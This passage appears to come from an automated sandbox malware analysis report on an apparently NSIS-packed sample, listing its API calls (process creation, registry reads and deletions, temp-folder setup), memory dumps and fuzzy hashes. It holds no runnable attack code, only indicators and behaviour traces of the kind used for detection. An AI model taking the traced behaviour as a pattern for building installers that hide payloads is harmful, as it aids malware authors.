                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-1218156502
                                      • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                      • Instruction ID: 3a3981258a6ccd3f3c7180c2fb01dffc681fdc90015df490a153c8b64b3610b8
                                      • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                      • Instruction Fuzzy Hash: 6DF08276708214ABEB108F55EC04B9B7B9CDF91760F10C03BFA48DA190D6B599548B99
                                      APIs
                                        • Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,?,00405870,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405812
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B
                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                        • Part of subcall function 004053D8: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040541B
                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,00000000,00000000,000000F0), ref: 00401634
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 00401629
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe
                                      • API String ID: 1892508949-143564976
                                      • Opcode ID: dc3f2b08dd0b23deb2200b8cff6eb9b6ab41173e829b03834ce904b4ad95c354
                                      • Instruction ID: 4fb2b9239308f527e4829455642bf5c86be9504270dcf99fcce102751257b2ff
                                      • Opcode Fuzzy Hash: dc3f2b08dd0b23deb2200b8cff6eb9b6ab41173e829b03834ce904b4ad95c354
                                      • Instruction Fuzzy Hash: 1611E736508141ABEF217F650D415BF27B0EA92325738467FE592B62E2C63C4942A63F
                                      APIs
                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
                                      • CloseHandle.KERNEL32(?), ref: 004054C0
                                      Strings
                                      • Error launching installer, xrefs: 0040549D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
                                      • Instruction ID: 90ee3f3d0c484d323fd0424032eb65db2415cafeee3384e03f1d9bc4b04e7a5d
                                      • Opcode Fuzzy Hash: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
                                      • Instruction Fuzzy Hash: FFE04FB4A002097FEB009B60EC05F7B7BBCEB00348F408561BD11F21A0E374A9508A78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
                                      • Instruction ID: ac331763182a67db8ffe8b732b67c8974d54266b30473341b06133cd37c0d4bc
                                      • Opcode Fuzzy Hash: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
                                      • Instruction Fuzzy Hash: ECA13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
                                      • Instruction ID: e89747aace1fce0fcb13a8d80e6f88749465aa03c559881c8099c8d07fdfb4d2
                                      • Opcode Fuzzy Hash: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
                                      • Instruction Fuzzy Hash: BE911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
                                      • Instruction ID: d456333056e0522eb9a81365918d8492ce98a85054e5b278218ea4b7938feab7
                                      • Opcode Fuzzy Hash: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
                                      • Instruction Fuzzy Hash: E1814671D04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C778AA96DF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
                                      • Instruction ID: 4327eab70650ef0c96a691b493921a8ab8e5ba0d824f916f670fcb6a13d6a8f8
                                      • Opcode Fuzzy Hash: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
                                      • Instruction Fuzzy Hash: 11816671D04228DBDF24CFA8C8447ADBBB1FB44315F2181AED856BB281C7786A96DF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
                                      • Instruction ID: 63ee65aff5d1ea53a99bb7455827a561e54e570c364fe5978cc4b9ff32097947
                                      • Opcode Fuzzy Hash: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
                                      • Instruction Fuzzy Hash: E9711271D04228CBDF24CFA8C8547ADBBF1FB48305F15806AD856BB281D7786A96DF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
                                      • Instruction ID: 2ec41c1936be718984cf19d05ce660ecedc56656b80368bbb2ce29215557a5c8
                                      • Opcode Fuzzy Hash: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
                                      • Instruction Fuzzy Hash: 53712571E04228CBDF28CF98C854BADBBB1FB44305F15816ED856BB281C7785996DF44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
                                      • Instruction ID: 94740bf10ed9628fc2a816943eb7322e71ed29eec5e37d1a6fe0f7c23d4f3e83
                                      • Opcode Fuzzy Hash: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
                                      • Instruction Fuzzy Hash: 1D714571E04228CBDF28CF98C854BADBBB1FB44305F11806ED856BB281C7786A96DF44
                                      APIs
                                      • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                      • GlobalAlloc.KERNEL32(00000040,00000404), ref: 00401BA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree
                                      • String ID: CreateTimer
                                      • API String ID: 3394109436-4043936699
                                      • Opcode ID: 6d590f43eb69b2c4634e3aaa82c59157183b08f5ad10ff4766659c2d74b3500e
                                      • Instruction ID: 3d889d12a0135df13ad9dc84ed8322f06a4567648c243a49bcaf602cfbc5661a
                                      • Opcode Fuzzy Hash: 6d590f43eb69b2c4634e3aaa82c59157183b08f5ad10ff4766659c2d74b3500e
                                      • Instruction Fuzzy Hash: 9721C376604301ABDB10EB95DE84A5F73B9EB48314720853BF202B32D5D778E8119F6E
                                      APIs
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                        • Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                        • Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                        • Part of subcall function 0040548A: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
                                        • Part of subcall function 0040548A: CloseHandle.KERNEL32(?), ref: 004054C0
                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                      • String ID:
                                      • API String ID: 3521207402-0
                                      • Opcode ID: 6f417624348e7a4d8987f4dc8f5a8d32866f9ac343c01c93fb87d8a6b3917473
                                      • Instruction ID: 49f7d359c4d218189077cc8fb8a526ed56d4096950e75cb47e310611910bd6fc
                                      • Opcode Fuzzy Hash: 6f417624348e7a4d8987f4dc8f5a8d32866f9ac343c01c93fb87d8a6b3917473
                                      • Instruction Fuzzy Hash: C4016D31904104EBDF11AFA1C984A9E77B2EF00354F10817BFA01B52E1C7785A85AB9A
                                      APIs
                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 43fdcb12208ecf4b22dbb00b887fd4ca96f50bb9be14fb34037b2d673bee9bdf
                                      • Instruction ID: 5ce6926f2417f3d17e5e854e85a0bcf64bccf2bfa1e8e40673093317e398bbc6
                                      • Opcode Fuzzy Hash: 43fdcb12208ecf4b22dbb00b887fd4ca96f50bb9be14fb34037b2d673bee9bdf
                                      • Instruction Fuzzy Hash: A711A771905205EFDF14DF64C6889AEBBB4EF11349F20843FE541B62C0D2B84A85DB5A
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                      • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                      • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                      • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                      APIs
                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseDeleteOpenValue
                                      • String ID:
                                      • API String ID: 849931509-0
                                      • Opcode ID: bac01e1814f4caa420f9743e48035a2343af4fd9601bd9a3d86b447afdead7f5
                                      • Instruction ID: 0b8f6a46cfbad05769843233fc9109b41d2ceb5d24a7fa4f39b64bc1fd674853
                                      • Opcode Fuzzy Hash: bac01e1814f4caa420f9743e48035a2343af4fd9601bd9a3d86b447afdead7f5
                                      • Instruction Fuzzy Hash: CDF04473A00110ABDB10BFA48A4EAAE72799B50345F14443BF201B61C1D9BD4D12966D
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 00404FF4
                                        • Part of subcall function 00403F2A: SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F3C
                                      • OleUninitialize.OLE32(00000404,00000000), ref: 00405040
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
